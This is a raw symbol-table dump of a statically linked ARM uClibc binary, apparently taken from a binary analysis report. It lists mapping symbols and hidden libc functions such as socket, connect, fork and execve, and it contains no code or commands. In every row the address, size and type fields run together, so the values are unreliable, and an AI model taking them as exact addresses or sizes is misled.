        $a.symtab0xcbe80NOTYPE<unknown>DEFAULT2
        $a.symtab0xed680NOTYPE<unknown>DEFAULT2
        $a.symtab0xf8740NOTYPE<unknown>DEFAULT2
        $a.symtab0xf9c40NOTYPE<unknown>DEFAULT2
        $a.symtab0x102000NOTYPE<unknown>DEFAULT2
        $a.symtab0x102580NOTYPE<unknown>DEFAULT2
        $a.symtab0x102b40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1034c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x103ac0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1058c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x106280NOTYPE<unknown>DEFAULT2
        $a.symtab0x107880NOTYPE<unknown>DEFAULT2
        $a.symtab0x109780NOTYPE<unknown>DEFAULT2
        $a.symtab0x10ac00NOTYPE<unknown>DEFAULT2
        $a.symtab0x10c300NOTYPE<unknown>DEFAULT2
        $a.symtab0x116300NOTYPE<unknown>DEFAULT2
        $a.symtab0x11c8c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x12ba80NOTYPE<unknown>DEFAULT2
        $a.symtab0x12bbc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x12d000NOTYPE<unknown>DEFAULT2
        $a.symtab0x12ebc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x130740NOTYPE<unknown>DEFAULT2
        $a.symtab0x131300NOTYPE<unknown>DEFAULT2
        $a.symtab0x1347c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x136480NOTYPE<unknown>DEFAULT2
        $a.symtab0x137300NOTYPE<unknown>DEFAULT2
        $a.symtab0x139000NOTYPE<unknown>DEFAULT2
        $a.symtab0x139e00NOTYPE<unknown>DEFAULT2
        $a.symtab0x13bcc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x144980NOTYPE<unknown>DEFAULT2
        $a.symtab0x14c580NOTYPE<unknown>DEFAULT2
        $a.symtab0x155e80NOTYPE<unknown>DEFAULT2
        $a.symtab0x157080NOTYPE<unknown>DEFAULT2
        $a.symtab0x159640NOTYPE<unknown>DEFAULT2
        $a.symtab0x167840NOTYPE<unknown>DEFAULT2
        $a.symtab0x16f180NOTYPE<unknown>DEFAULT2
        $a.symtab0x16f400NOTYPE<unknown>DEFAULT2
        $a.symtab0x16f740NOTYPE<unknown>DEFAULT2
        $a.symtab0x16fdc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x170300NOTYPE<unknown>DEFAULT2
        $a.symtab0x170540NOTYPE<unknown>DEFAULT2
        $a.symtab0x1706c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x170900NOTYPE<unknown>DEFAULT2
        $a.symtab0x170f80NOTYPE<unknown>DEFAULT2
        $a.symtab0x172240NOTYPE<unknown>DEFAULT2
        $a.symtab0x172ac0NOTYPE<unknown>DEFAULT2
        $a.symtab0x173100NOTYPE<unknown>DEFAULT2
        $a.symtab0x1739c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x175080NOTYPE<unknown>DEFAULT2
        $a.symtab0x1751c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1762c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x176f80NOTYPE<unknown>DEFAULT2
        $a.symtab0x177dc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x177e00NOTYPE<unknown>DEFAULT2
        $a.symtab0x178540NOTYPE<unknown>DEFAULT2
        $a.symtab0x178a40NOTYPE<unknown>DEFAULT2
        $a.symtab0x178d00NOTYPE<unknown>DEFAULT2
        $a.symtab0x178fc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x179240NOTYPE<unknown>DEFAULT2
        $a.symtab0x179500NOTYPE<unknown>DEFAULT2
        $a.symtab0x1797c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x179a80NOTYPE<unknown>DEFAULT2
        $a.symtab0x179d40NOTYPE<unknown>DEFAULT2
        $a.symtab0x17a240NOTYPE<unknown>DEFAULT2
        $a.symtab0x17a500NOTYPE<unknown>DEFAULT2
        $a.symtab0x17abc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x17aec0NOTYPE<unknown>DEFAULT2
        $a.symtab0x17b180NOTYPE<unknown>DEFAULT2
        $a.symtab0x17b440NOTYPE<unknown>DEFAULT2
        $a.symtab0x17b740NOTYPE<unknown>DEFAULT2
        $a.symtab0x17ba00NOTYPE<unknown>DEFAULT2
        $a.symtab0x17bcc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x17c800NOTYPE<unknown>DEFAULT2
        $a.symtab0x17d7c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x17e4c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x17e580NOTYPE<unknown>DEFAULT2
        $a.symtab0x17e8c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x17ebc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x17ef00NOTYPE<unknown>DEFAULT2
        $a.symtab0x17fa00NOTYPE<unknown>DEFAULT2
        $a.symtab0x180100NOTYPE<unknown>DEFAULT2
        $a.symtab0x180200NOTYPE<unknown>DEFAULT2
        $a.symtab0x180d80NOTYPE<unknown>DEFAULT2
        $a.symtab0x181080NOTYPE<unknown>DEFAULT2
        $a.symtab0x187cc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x188640NOTYPE<unknown>DEFAULT2
        $a.symtab0x1889c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x18a380NOTYPE<unknown>DEFAULT2
        $a.symtab0x18a840NOTYPE<unknown>DEFAULT2
        $a.symtab0x18f480NOTYPE<unknown>DEFAULT2
        $a.symtab0x18f7c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x190300NOTYPE<unknown>DEFAULT2
        $a.symtab0x190400NOTYPE<unknown>DEFAULT2
        $a.symtab0x190500NOTYPE<unknown>DEFAULT2
        $a.symtab0x190f00NOTYPE<unknown>DEFAULT2
        $a.symtab0x191500NOTYPE<unknown>DEFAULT2
        $a.symtab0x191780NOTYPE<unknown>DEFAULT2
        $a.symtab0x192580NOTYPE<unknown>DEFAULT2
        $a.symtab0x193500NOTYPE<unknown>DEFAULT2
        $a.symtab0x193640NOTYPE<unknown>DEFAULT2
        $a.symtab0x1944c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1946c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x194d80NOTYPE<unknown>DEFAULT2
        $a.symtab0x195640NOTYPE<unknown>DEFAULT2
        $a.symtab0x195880NOTYPE<unknown>DEFAULT2
        $a.symtab0x195b40NOTYPE<unknown>DEFAULT2
        $a.symtab0x195e00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1960c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1963c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x196680NOTYPE<unknown>DEFAULT2
        $a.symtab0x1969c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x196c80NOTYPE<unknown>DEFAULT2
        $a.symtab0x196fc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1972c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x197580NOTYPE<unknown>DEFAULT2
        $a.symtab0x198100NOTYPE<unknown>DEFAULT2
        $a.symtab0x1987c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x199d00NOTYPE<unknown>DEFAULT2
        $a.symtab0x19a280NOTYPE<unknown>DEFAULT2
        $a.symtab0x19b180NOTYPE<unknown>DEFAULT2
        $a.symtab0x19c300NOTYPE<unknown>DEFAULT2
        $a.symtab0x19cc40NOTYPE<unknown>DEFAULT2
        $a.symtab0x19d500NOTYPE<unknown>DEFAULT2
        $a.symtab0x19e780NOTYPE<unknown>DEFAULT2
        $a.symtab0x19fc00NOTYPE<unknown>DEFAULT2
        $a.symtab0x19fc40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a0400NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a0cc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a1640NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a1e00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a2a00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a3300NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a3fc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a4c40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a5fc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a6080NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a6100NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a7a80NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a83c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1a8d00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1aa740NOTYPE<unknown>DEFAULT2
        $a.symtab0x1acdc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1ae240NOTYPE<unknown>DEFAULT2
        $a.symtab0x1ae900NOTYPE<unknown>DEFAULT2
        $a.symtab0x1aed40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1af300NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b17c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b2600NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b2900NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b2980NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b2c40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b2ec0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b3180NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b3440NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b3940NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b4280NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b58c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b5b80NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b5e40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b6100NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b6280NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b68c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b6b80NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b7100NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b7640NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b7900NOTYPE<unknown>DEFAULT2
        $a.symtab0x1b7bc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1bb980NOTYPE<unknown>DEFAULT2
        $a.symtab0x1bbe80NOTYPE<unknown>DEFAULT2
        $a.symtab0x1bc080NOTYPE<unknown>DEFAULT2
        $a.symtab0x1bcc40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1bd800NOTYPE<unknown>DEFAULT2
        $a.symtab0x1beb80NOTYPE<unknown>DEFAULT2
        $a.symtab0x1bfbc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1c02c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1c0600NOTYPE<unknown>DEFAULT2
        $a.symtab0x1c1b00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1c9b00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1ce400NOTYPE<unknown>DEFAULT2
        $a.symtab0x1cf3c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1cf540NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d0400NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d12c0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d1440NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d1680NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d1a40NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d1c00NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d1cc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d2fc0NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d3c80NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d3f80NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d5380NOTYPE<unknown>DEFAULT2
        $a.symtab0x1d9380NOTYPE<unknown>DEFAULT2
        $a.symtab0x1de640NOTYPE<unknown>DEFAULT2
        $a.symtab0x1df8c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b0040NOTYPE<unknown>DEFAULT6
        $d.symtab0x2b00c0NOTYPE<unknown>DEFAULT7
        $d.symtab0x2b0200NOTYPE<unknown>DEFAULT9
        $d.symtab0x81180NOTYPE<unknown>DEFAULT2
        $d.symtab0x81740NOTYPE<unknown>DEFAULT2
        $d.symtab0x1e0100NOTYPE<unknown>DEFAULT2
        $d.symtab0x81c00NOTYPE<unknown>DEFAULT2
        $d.symtab0x84480NOTYPE<unknown>DEFAULT2
        $d.symtab0x87140NOTYPE<unknown>DEFAULT2
        $d.symtab0x95d40NOTYPE<unknown>DEFAULT2
        $d.symtab0x9d340NOTYPE<unknown>DEFAULT2
        $d.symtab0xa4980NOTYPE<unknown>DEFAULT2
        $d.symtab0xabf80NOTYPE<unknown>DEFAULT2
        $d.symtab0xb35c0NOTYPE<unknown>DEFAULT2
        $d.symtab0xbabc0NOTYPE<unknown>DEFAULT2
        $d.symtab0xbb980NOTYPE<unknown>DEFAULT2
        $d.symtab0xbc740NOTYPE<unknown>DEFAULT2
        $d.symtab0xbcb80NOTYPE<unknown>DEFAULT2
        $d.symtab0xc7b80NOTYPE<unknown>DEFAULT2
        $d.symtab0xc8640NOTYPE<unknown>DEFAULT2
        $d.symtab0xcb6c0NOTYPE<unknown>DEFAULT2
        $d.symtab0xcbc00NOTYPE<unknown>DEFAULT2
        $d.symtab0xed2c0NOTYPE<unknown>DEFAULT2
        $d.symtab0xf9b40NOTYPE<unknown>DEFAULT2
        $d.symtab0x101d80NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b0240NOTYPE<unknown>DEFAULT9
        $d.symtab0x102480NOTYPE<unknown>DEFAULT2
        $d.symtab0x102a40NOTYPE<unknown>DEFAULT2
        $d.symtab0x103380NOTYPE<unknown>DEFAULT2
        $d.symtab0x105880NOTYPE<unknown>DEFAULT2
        $d.symtab0x107740NOTYPE<unknown>DEFAULT2
        $d.symtab0x109600NOTYPE<unknown>DEFAULT2
        $d.symtab0x10ab00NOTYPE<unknown>DEFAULT2
        $d.symtab0x10c200NOTYPE<unknown>DEFAULT2
        $d.symtab0x116040NOTYPE<unknown>DEFAULT2
        $d.symtab0x11bc00NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b0500NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b08c0NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b0ac0NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b0b40NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b0d80NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b1140NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b1300NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b1340NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b1380NOTYPE<unknown>DEFAULT9
        $d.symtab0x12bb80NOTYPE<unknown>DEFAULT2
        $d.symtab0x12eb00NOTYPE<unknown>DEFAULT2
        $d.symtab0x130240NOTYPE<unknown>DEFAULT2
        $d.symtab0x1312c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x134200NOTYPE<unknown>DEFAULT2
        $d.symtab0x136440NOTYPE<unknown>DEFAULT2
        $d.symtab0x138f40NOTYPE<unknown>DEFAULT2
        $d.symtab0x139dc0NOTYPE<unknown>DEFAULT2
        $d.symtab0x13bc40NOTYPE<unknown>DEFAULT2
        $d.symtab0x1446c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x14bc80NOTYPE<unknown>DEFAULT2
        $d.symtab0x157000NOTYPE<unknown>DEFAULT2
        $d.symtab0x159240NOTYPE<unknown>DEFAULT2
        $d.symtab0x166fc0NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b4b00NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b4ec0NOTYPE<unknown>DEFAULT9
        $d.symtab0x2b52c0NOTYPE<unknown>DEFAULT9
        $d.symtab0x173000NOTYPE<unknown>DEFAULT2
        $d.symtab0x173980NOTYPE<unknown>DEFAULT2
        $d.symtab0x174fc0NOTYPE<unknown>DEFAULT2
        $d.symtab0x175180NOTYPE<unknown>DEFAULT2
        $d.symtab0x17ab80NOTYPE<unknown>DEFAULT2
        $d.symtab0x17c700NOTYPE<unknown>DEFAULT2
        $d.symtab0x17d780NOTYPE<unknown>DEFAULT2
        $d.symtab0x17e3c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x17e540NOTYPE<unknown>DEFAULT2
        $d.symtab0x17e880NOTYPE<unknown>DEFAULT2
        $d.symtab0x1800c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x1801c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x180c80NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b5ec0NOTYPE<unknown>DEFAULT9
        $d.symtab0x2203c0NOTYPE<unknown>DEFAULT4
        $d.symtab0x187b80NOTYPE<unknown>DEFAULT2
        $d.symtab0x18a340NOTYPE<unknown>DEFAULT2
        $d.symtab0x18a780NOTYPE<unknown>DEFAULT2
        $d.symtab0x18f240NOTYPE<unknown>DEFAULT2
        $d.symtab0x192500NOTYPE<unknown>DEFAULT2
        $d.symtab0x194440NOTYPE<unknown>DEFAULT2
        $d.symtab0x194d40NOTYPE<unknown>DEFAULT2
        $d.symtab0x195600NOTYPE<unknown>DEFAULT2
        $d.symtab0x1980c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x199b80NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b7280NOTYPE<unknown>DEFAULT9
        $d.symtab0x19b000NOTYPE<unknown>DEFAULT2
        $d.symtab0x19c200NOTYPE<unknown>DEFAULT2
        $d.symtab0x19fb00NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b8300NOTYPE<unknown>DEFAULT9
        $d.symtab0x1a0280NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a0b40NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a14c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a1c80NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b8480NOTYPE<unknown>DEFAULT9
        $d.symtab0x1a29c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a32c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a3f00NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a4c00NOTYPE<unknown>DEFAULT2
        $d.symtab0x22c600NOTYPE<unknown>DEFAULT4
        $d.symtab0x1a5f00NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a7a40NOTYPE<unknown>DEFAULT2
        $d.symtab0x1a8200NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b8fc0NOTYPE<unknown>DEFAULT9
        $d.symtab0x1a8cc0NOTYPE<unknown>DEFAULT2
        $d.symtab0x1aa700NOTYPE<unknown>DEFAULT2
        $d.symtab0x1aa840NOTYPE<unknown>DEFAULT2
        $d.symtab0x1ae140NOTYPE<unknown>DEFAULT2
        $d.symtab0x1ae800NOTYPE<unknown>DEFAULT2
        $d.symtab0x1aed00NOTYPE<unknown>DEFAULT2
        $d.symtab0x1af200NOTYPE<unknown>DEFAULT2
        $d.symtab0x1b1480NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b9140NOTYPE<unknown>DEFAULT9
        $d.symtab0x1b2580NOTYPE<unknown>DEFAULT2
        $d.symtab0x1b6240NOTYPE<unknown>DEFAULT2
        $d.symtab0x1b70c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x1c97c0NOTYPE<unknown>DEFAULT2
        $d.symtab0x22fb80NOTYPE<unknown>DEFAULT4
        $d.symtab0x1cf340NOTYPE<unknown>DEFAULT2
        $d.symtab0x1d0380NOTYPE<unknown>DEFAULT2
        $d.symtab0x1d1280NOTYPE<unknown>DEFAULT2
        $d.symtab0x1d1600NOTYPE<unknown>DEFAULT2
        $d.symtab0x1d1a00NOTYPE<unknown>DEFAULT2
        $d.symtab0x1d2ec0NOTYPE<unknown>DEFAULT2
        $d.symtab0x2b9180NOTYPE<unknown>DEFAULT9
        $d.symtab0x2e2240NOTYPE<unknown>DEFAULT10
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        /home/firmware/build/temp-armv4l/gcc-core/gcc/config/arm/lib1funcs.asm.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        C.38.4915.symtab0x1f1e53OBJECT<unknown>DEFAULT4
        C.39.4916.symtab0x1f1dc9OBJECT<unknown>DEFAULT4
        C.6.4896.symtab0x2202d3OBJECT<unknown>DEFAULT4
        C.7.4897.symtab0x220249OBJECT<unknown>DEFAULT4
        LOCAL_ADDRESS.symtab0x2e2304OBJECT<unknown>DEFAULT10
        Laligned.symtab0x191180NOTYPE<unknown>DEFAULT2
        Llastword.symtab0x191340NOTYPE<unknown>DEFAULT2
        _Jv_RegisterClasses.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
        _WRITE.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __CTOR_END__.symtab0x2b0080OBJECT<unknown>DEFAULT6
        __CTOR_LIST__.symtab0x2b0040OBJECT<unknown>DEFAULT6
        __C_ctype_b.symtab0x2b9184OBJECT<unknown>DEFAULT9
        __C_ctype_b.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
        __C_ctype_b_data.symtab0x22ca4768OBJECT<unknown>DEFAULT4
        __DTOR_END__.symtab0x2b0100OBJECT<unknown>DEFAULT7
        __DTOR_LIST__.symtab0x2b00c0OBJECT<unknown>DEFAULT7
        __EH_FRAME_BEGIN__.symtab0x230000OBJECT<unknown>DEFAULT5
        __FRAME_END__.symtab0x230000OBJECT<unknown>DEFAULT5
        __GI___C_ctype_b.symtab0x2b9184OBJECT<unknown>HIDDEN9
        __GI___C_ctype_b_data.symtab0x22ca4768OBJECT<unknown>HIDDEN4
        __GI___ctype_b.symtab0x2b91c4OBJECT<unknown>HIDDEN9
        __GI___errno_location.symtab0x17e4c12FUNC<unknown>HIDDEN2
        __GI___glibc_strerror_r.symtab0x1935020FUNC<unknown>HIDDEN2
        __GI___libc_fcntl.symtab0x177e0116FUNC<unknown>HIDDEN2
        __GI___libc_fcntl64.symtab0x1785480FUNC<unknown>HIDDEN2
        __GI___libc_open.symtab0x17a5092FUNC<unknown>HIDDEN2
        __GI___uClibc_fini.symtab0x1ae24108FUNC<unknown>HIDDEN2
        __GI___uClibc_init.symtab0x1aed492FUNC<unknown>HIDDEN2
        __GI___xpg_strerror_r.symtab0x19364232FUNC<unknown>HIDDEN2
        __GI__exit.symtab0x1b2c440FUNC<unknown>HIDDEN2
        __GI_abort.symtab0x19e78328FUNC<unknown>HIDDEN2
        __GI_atoi.symtab0x1a5fc12FUNC<unknown>HIDDEN2
        __GI_atol.symtab0x1a5fc12FUNC<unknown>HIDDEN2
        __GI_bind.symtab0x1958844FUNC<unknown>HIDDEN2
        __GI_brk.symtab0x1d16860FUNC<unknown>HIDDEN2
        __GI_clock_getres.symtab0x1b2ec44FUNC<unknown>HIDDEN2
        __GI_close.symtab0x178a444FUNC<unknown>HIDDEN2
        __GI_closedir.symtab0x17bcc180FUNC<unknown>HIDDEN2
        __GI_connect.symtab0x195b444FUNC<unknown>HIDDEN2
        __GI_errno.symtab0x2e2244OBJECT<unknown>HIDDEN10
        __GI_execl.symtab0x1a83c148FUNC<unknown>HIDDEN2
        __GI_execve.symtab0x1b31844FUNC<unknown>HIDDEN2
        __GI_exit.symtab0x1a7a8148FUNC<unknown>HIDDEN2
        __GI_fcntl.symtab0x177e0116FUNC<unknown>HIDDEN2
        __GI_fcntl64.symtab0x1785480FUNC<unknown>HIDDEN2
        __GI_fork.symtab0x178d044FUNC<unknown>HIDDEN2
        __GI_fputs_unlocked.symtab0x18f4852FUNC<unknown>HIDDEN2
        __GI_fseek.symtab0x1d1c012FUNC<unknown>HIDDEN2
        __GI_fseeko64.symtab0x1d1cc304FUNC<unknown>HIDDEN2
        __GI_fstat.symtab0x1b34480FUNC<unknown>HIDDEN2
        __GI_fwrite_unlocked.symtab0x18f7c172FUNC<unknown>HIDDEN2
        __GI_getdtablesize.symtab0x178fc40FUNC<unknown>HIDDEN2
        __GI_getegid.symtab0x1b58c44FUNC<unknown>HIDDEN2
        __GI_geteuid.symtab0x1b5b844FUNC<unknown>HIDDEN2
        __GI_getgid.symtab0x1b5e444FUNC<unknown>HIDDEN2
        __GI_getpagesize.symtab0x1b61024FUNC<unknown>HIDDEN2
        __GI_getpid.symtab0x1792444FUNC<unknown>HIDDEN2
        __GI_getrlimit.symtab0x1797c44FUNC<unknown>HIDDEN2
        __GI_getsockname.symtab0x195e044FUNC<unknown>HIDDEN2
        __GI_getuid.symtab0x179a844FUNC<unknown>HIDDEN2
        __GI_h_errno.symtab0x2e2284OBJECT<unknown>HIDDEN10
        __GI_inet_addr.symtab0x1956436FUNC<unknown>HIDDEN2
        __GI_inet_aton.symtab0x1d040236FUNC<unknown>HIDDEN2
        __GI_inet_ntoa.symtab0x1955812FUNC<unknown>HIDDEN2
        __GI_inet_ntoa_r.symtab0x194d8128FUNC<unknown>HIDDEN2
        __GI_initstate_r.symtab0x1a3fc200FUNC<unknown>HIDDEN2
        __GI_ioctl.symtab0x179d480FUNC<unknown>HIDDEN2
        __GI_isatty.symtab0x1944c32FUNC<unknown>HIDDEN2
        __GI_kill.symtab0x17a2444FUNC<unknown>HIDDEN2
        __GI_lseek64.symtab0x1b628100FUNC<unknown>HIDDEN2
        __GI_memchr.symtab0x1ce40252FUNC<unknown>HIDDEN2
        __GI_memcpy.symtab0x190304FUNC<unknown>HIDDEN2
        __GI_memmove.symtab0x190404FUNC<unknown>HIDDEN2
        __GI_mempcpy.symtab0x1cf3c24FUNC<unknown>HIDDEN2
        __GI_memrchr.symtab0x1cf54236FUNC<unknown>HIDDEN2
        __GI_memset.symtab0x19050156FUNC<unknown>HIDDEN2
        __GI_nanosleep.symtab0x1b68c44FUNC<unknown>HIDDEN2
        __GI_open.symtab0x17a5092FUNC<unknown>HIDDEN2
        __GI_opendir.symtab0x17c80252FUNC<unknown>HIDDEN2
        __GI_raise.symtab0x1d12c24FUNC<unknown>HIDDEN2
        __GI_random.symtab0x19fc4124FUNC<unknown>HIDDEN2
        __GI_random_r.symtab0x1a2a0144FUNC<unknown>HIDDEN2
        __GI_read.symtab0x17aec44FUNC<unknown>HIDDEN2
        __GI_readdir.symtab0x17d7c208FUNC<unknown>HIDDEN2
        __GI_readlink.symtab0x17b1844FUNC<unknown>HIDDEN2
        __GI_recv.symtab0x1963c44FUNC<unknown>HIDDEN2
        __GI_recvfrom.symtab0x1966852FUNC<unknown>HIDDEN2
        __GI_sbrk.symtab0x1b6b888FUNC<unknown>HIDDEN2
        __GI_select.symtab0x17b4448FUNC<unknown>HIDDEN2
        __GI_send.symtab0x1969c44FUNC<unknown>HIDDEN2
        __GI_sendto.symtab0x196c852FUNC<unknown>HIDDEN2
        __GI_setsockopt.symtab0x196fc48FUNC<unknown>HIDDEN2
        __GI_setstate_r.symtab0x1a1e0192FUNC<unknown>HIDDEN2
        __GI_sigaction.symtab0x1b17c228FUNC<unknown>HIDDEN2
        __GI_signal.symtab0x19758184FUNC<unknown>HIDDEN2
        __GI_sigprocmask.symtab0x1b71084FUNC<unknown>HIDDEN2
        __GI_sleep.symtab0x1a8d0420FUNC<unknown>HIDDEN2
        __GI_snprintf.symtab0x17e8c48FUNC<unknown>HIDDEN2
        __GI_socket.symtab0x1972c44FUNC<unknown>HIDDEN2
        __GI_sprintf.symtab0x17ebc52FUNC<unknown>HIDDEN2
        __GI_srandom_r.symtab0x1a330204FUNC<unknown>HIDDEN2
        __GI_strcat.symtab0x1915040FUNC<unknown>HIDDEN2
        __GI_strlen.symtab0x190f096FUNC<unknown>HIDDEN2
        __GI_strnlen.symtab0x19178224FUNC<unknown>HIDDEN2
        __GI_strstr.symtab0x19258248FUNC<unknown>HIDDEN2
        __GI_strtol.symtab0x1a6088FUNC<unknown>HIDDEN2
        __GI_sysconf.symtab0x1aa74944FUNC<unknown>HIDDEN2
        __GI_tcgetattr.symtab0x1946c108FUNC<unknown>HIDDEN2
        __GI_time.symtab0x17b7444FUNC<unknown>HIDDEN2
        __GI_times.symtab0x1b76444FUNC<unknown>HIDDEN2
        __GI_vfork.symtab0x1b26040FUNC<unknown>HIDDEN2
        __GI_vsnprintf.symtab0x17ef0176FUNC<unknown>HIDDEN2
        __GI_wait4.symtab0x1b79044FUNC<unknown>HIDDEN2
